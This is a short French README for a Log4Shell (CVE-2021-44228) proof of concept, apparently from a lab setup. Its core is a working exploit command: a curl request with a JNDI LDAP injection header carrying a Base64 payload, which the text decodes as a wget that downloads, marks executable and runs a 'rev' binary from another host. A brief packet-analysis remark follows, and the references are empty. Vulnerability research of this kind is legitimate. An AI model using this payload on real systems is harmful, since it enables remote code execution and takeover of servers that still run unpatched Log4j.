
Preuve de concept d'exploitation pour Log4Shell (CVE-2021-44228) avec configuration du serveur LDAP, génération de charge utile et analyse de capture de paquets pour la recherche éducative sur les vulnérabilités.
Log4Shell — également connu sous le nom de CVE-2021-44228 — est une vulnérabilité critique qui permet l'exécution de code à distance dans les systèmes utilisant Log4j de la Fondation Apache, qui est une bibliothèque Java open-source largement utilisée dans les produits logiciels commerciaux et open-source ainsi que dans les utilitaires

Analyse du POC
Le serveur vulnérable fonctionne sur le port 8080

Et le serveur ldap fonctionne sur deux ports : http 8888 et ldap 1389

COMMANDE D'EXPLOITATION
curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'
{
172.17.0.2:8080 -- Adresse IP du serveur vulnérable
172.17.0.1:1389 -- Adresse IP du serveur LDAP
Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==
Commande déchiffrée - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev
}
ANALYSE DES PAQUETS


COMME NOUS POUVONS LE VOIR DANS LES PAQUETS, LE SERVEUR ENVOIE UNE REQUÊTE GET POUR UNE CLASSE AU SERVEUR LDAP. SI NOUS VÉRIFIONS LA CLASSE D'EXPLOITATION, NOUS POUVONS VOIR QUE LE SERVEUR LDAP ENVOIE LA COMMANDE DÉCHIFFRÉE DANS LA CLASSE D'EXPLOITATION.

Références